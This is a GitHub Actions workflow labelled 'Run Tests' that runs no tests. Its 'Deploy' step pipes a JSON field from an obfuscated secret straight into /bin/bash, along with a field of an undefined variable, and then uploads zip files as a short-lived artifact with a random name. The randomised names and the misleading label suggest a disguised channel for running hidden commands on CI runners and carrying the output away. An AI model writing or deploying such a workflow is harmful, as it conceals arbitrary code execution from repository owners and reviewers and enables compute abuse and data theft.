name: Run Tests
on:
  workflow_dispatch:

jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          hwql38: ${{ secrets.hwql38 }}
        run: |
          printf '%s' "$hwql38" | jq -r .gayb067 | /bin/bash
          echo $rm17985 | jq -r .cngsp912 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: WSwXvE8G
          path: "*.zip"
          retention-days: 1
